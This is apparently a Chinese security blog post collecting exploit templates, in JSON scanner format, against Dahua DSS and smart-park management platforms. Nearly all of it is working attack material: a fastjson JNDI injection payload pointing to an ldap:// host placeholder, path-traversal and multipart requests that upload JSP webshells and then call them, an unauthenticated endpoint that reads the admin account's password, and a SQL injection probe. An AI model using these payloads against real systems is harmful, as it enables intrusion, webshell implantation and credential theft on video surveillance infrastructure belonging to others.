dahua_dss_漏洞汇总

前言

大华的漏洞太多了,写个笔记汇总一下

大华DSS前台命令执行漏洞

https://github.com/bcvgh/daydayExp-pocs/blob/main/dahua/%E5%A4%A7%E5%8D%8EDSS%E5%89%8D%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.json

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
{
  "num": 2,
  "name":"大华DSS前台命令执行漏洞",
  "tag":"dahua",
  "type":"exec",
  "poc": {
    "pocGet": "/ipms/barpay/pay",
    "pocPost": "{\"@type\": \"com.sun.rowset.JdbcRowSetImpl\", \"dataSourceName\": \"ldap://xxxxx/Basic/TomcatEcho\", \"autoCommit\": true}",
    "header": {
      "cookie": "hades-session-id=cbbce521-a761-403d-b699-9849d2cb06b9;",
      "content-type": "application/json",
      "User-Agent": "Mozilla/5.0 (Linux;"
    },
    "Pattern": "({\"status\":200})"
  }
}

大华DSS前台文件上传

https://github.com/bcvgh/daydayExp-pocs/blob/main/dahua/%E5%A4%A7%E5%8D%8EDSS%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0.json

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
{
  "num": 2,
  "name":"大华DSS前台文件上传",
  "tag":"dahua",
  "type":"upload",
  "poc": {
    "pocGet": "/emap/bitmap/bitMap_addLayer.action?jsonstr={%22mapx%22:null,%22mapy%22:null,%22name%22:%22%22,%22path%22:%22%22,%22desc%22:%22%22,%22pId%22:null}",
    "pocPost": "id=1",
    "header": {
      "cookie": "hades-session-id=cbbce521-a761-403d-b699-9849d2cb06b9;",
      "content-type": "multipart/form-data; boundary=----WebKitFormBoundaryGcEYB5EKXKmZXB0R",
      "User-Agent": "Mozilla/5.0 (Linux;"
    },
    "Pattern": "({\"status\":200})"
  }
}

大华智慧园区管理平台poi文件上传

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
{
  "name":"大华智慧园区管理平台poi文件上传",
  "tag":"dahua",
  "type":"upload",
  "poc": {
    "pocGet": "/emap/webservice/gis/soap/poi",
    "pocPost": "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:res=\"http://response.webservice.poi.mapbiz.emap.dahuatech.com/\">\r\n   <soapenv:Header/>\r\n   <soapenv:Body>\r\n      <res:uploadPicFile>\r\n         <!--type: string-->\r\n         <arg0>/../../test.jsp</arg0>\r\n         <!--type: base64Binary-->\r\n         <arg1>PCVvdXQucHJpbnQoIjExbnh4Iik7JT4=</arg1>\r\n      </res:uploadPicFile>\r\n   </soapenv:Body>\r\n</soapenv:Envelope>",
    "header": {
      "cookie": "hades-session-id=cbbce521-a761-403d-b699-9849d2cb06b9;",
      "User-Agent": "Mozilla/5.0 (Linux;",
      "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8"
    },
    "Pattern": "(uploadPicFileResponse)"
  },
  "exp": {
    "step1": {
      "expGet": "/emap/webservice/gis/soap/poi",
      "expPost": "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:res=\"http://response.webservice.poi.mapbiz.emap.dahuatech.com/\">\n   <soapenv:Header/>\n   <soapenv:Body>\n      <res:uploadPicFile>\n         <!--type: string-->\n         <arg0>/../../24k.jsp</arg0>\n         <!--type: base64Binary-->\n         <arg1>{webshell:Base64Encode:1}</arg1>\n      </res:uploadPicFile>\n   </soapenv:Body>\n</soapenv:Envelope>",
      "header": {
        "cookie": "hades-session-id=cbbce521-a761-403d-b699-9849d2cb06b9;",
        "User-Agent": "Mozilla/5.0 (Linux;",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8"
      },
      "Pattern": "(uploadPicFileResponse)"
    },
    "step2": {
      "expGet": "/upload/24k.jsp",
      "header": {
        "cookie": "hades-session-id=cbbce521-a761-403d-b699-9849d2cb06b9;",
        "content-type": "multipart/form-data; boundary=----WebKitFormBoundaryCJEleSRxsqS0lAFv",
        "User-Agent": "Mozilla/5.0 (Linux;"
      },
      "Pattern": "()"
    }
  }
}

大华智慧园区管理平台文件上传

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
{
  "name":"大华智慧园区管理平台文件上传",
  "tag":"dahua",
  "type":"upload",
  "poc": {
    "pocGet": "/publishing/publishing/material/file/video",
    "pocPost": "id=1",
    "header": {
      "cookie": "hades-session-id=cbbce521-a761-403d-b699-9849d2cb06b9;",
      "content-type": "multipart/form-data; boundary=----WebKitFormBoundaryCJEleSRxsqS0lAFv",
      "User-Agent": "Mozilla/5.0 (Linux;"
    },
    "Pattern": "(上传文件为空,请重新上传)"
  },
  "exp": {
    "step1": {
      "expGet": "/publishing/publishing/material/file/video",
      "expPost": "------WebKitFormBoundaryCJEleSRxsqS0lAFv\r\nContent-Disposition: form-data; name=\"Filedata\";filename=\"24k.jsp\"\r\n\r\n{webshell}\r\n------WebKitFormBoundaryCJEleSRxsqS0lAFv--",
      "header": {
        "cookie": "hades-session-id=cbbce521-a761-403d-b699-9849d2cb06b9;",
        "content-type": "multipart/form-data; boundary=----WebKitFormBoundaryCJEleSRxsqS0lAFv",
        "User-Agent": "Mozilla/5.0 (Linux;"
      },
      "Pattern": "([0-9]*\\.jsp)"
    },
    "step2": {
      "expGet": "/publishingImg/VIDEO/{shellPath}",
      "header": {
        "cookie": "hades-session-id=cbbce521-a761-403d-b699-9849d2cb06b9;",
        "content-type": "multipart/form-data; boundary=----WebKitFormBoundaryCJEleSRxsqS0lAFv",
        "User-Agent": "Mozilla/5.0 (Linux;"
      },
      "Pattern": "()"
    }
  }
}

大华智慧园区综合管理平台SQL注入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
{
  "num": 2,
  "name":"大华智慧园区综合管理平台SQL注入",
  "tag":"dahua",
  "type":"sql",
  "poc": {
    "pocGet": "/portal/services",
    "header": {
      "cookie": "hades-session-id=cbbce521-a761-403d-b699-9849d2cb06b9;",
      "content-type": "application/x-www-form-urlencoded",
      "User-Agent": "Mozilla/5.0 (Linux;"
    },
    "Pattern": "(Available SOAP)"
  }
}

大华智慧园区综合管理平台fastjson

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
{
  "num": 2,
  "name":"大华智慧园区综合管理平台fastjson",
  "tag":"dahua",
  "type":"cmd",
  "poc": {
    "pocGet": "/eventCenter/sendCustomerMsg",
    "pocPost": "id=1",
    "header": {
      "cookie": "hades-session-id=cbbce521-a761-403d-b699-9849d2cb06b9;",
      "content-type": "application/json",
      "User-Agent": "Mozilla/5.0 (Linux;"
    },
    "Pattern": "({\"status\":200})"
  }
}

大华智慧园区综合管理平台任意文件上传

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
{
  "num": 2,
  "name":"大华智慧园区综合管理平台任意文件上传(时间戳)",
  "tag":"dahua",
  "type":"upload",
  "poc": {
    "pocGet": "/face/personInfo/uploadBatch",
    "pocPost": "--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT\r\nContent-Disposition: form-data; name=\"file\"; filename=\"111.jsp\"\r\nContent-Type: application/zip\r\n\r\n123\r\n--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--",
    "header": {
      "cookie": "hades-session-id=cbbce521-a761-403d-b699-9849d2cb06b9;",
      "content-type": "multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT",
      "User-Agent": "Mozilla/5.0 (Linux;",
      "Accept-Encoding": "gzip, deflate",
      "Accept": "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"
    },
    "Pattern": "(zip)"
  }
}

大华智慧园区综合管理平台后台帐号密码读取

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
{
  "num": 2,
  "name":"大华智慧园区综合管理平台后台帐号密码读取",
  "tag":"dahua",
  "type":"unauthorized",
  "poc": {
    "pocGet": "/admin/user_getUserInfoByUserName.action?userName=system",
    "header": {
      "cookie": "hades-session-id=cbbce521-a761-403d-b699-9849d2cb06b9;",
      "content-type": "application/x-www-form-urlencoded",
      "User-Agent": "Mozilla/5.0 (Linux;"
    },
    "Pattern": "(loginName)"
  }
}

大华智慧园区综合管理平台initSession泄漏远程代码执行漏洞

https://github.com/0xf4n9x/DaHuaWPMSinitSessionRCE

#exp
dahua_dss_漏洞汇总
https://blog.njcit.me/2023/10/30/poc_exp/dahua-dss-漏洞汇总/
作者
ccadmin
发布于
2023年10月30日
许可协议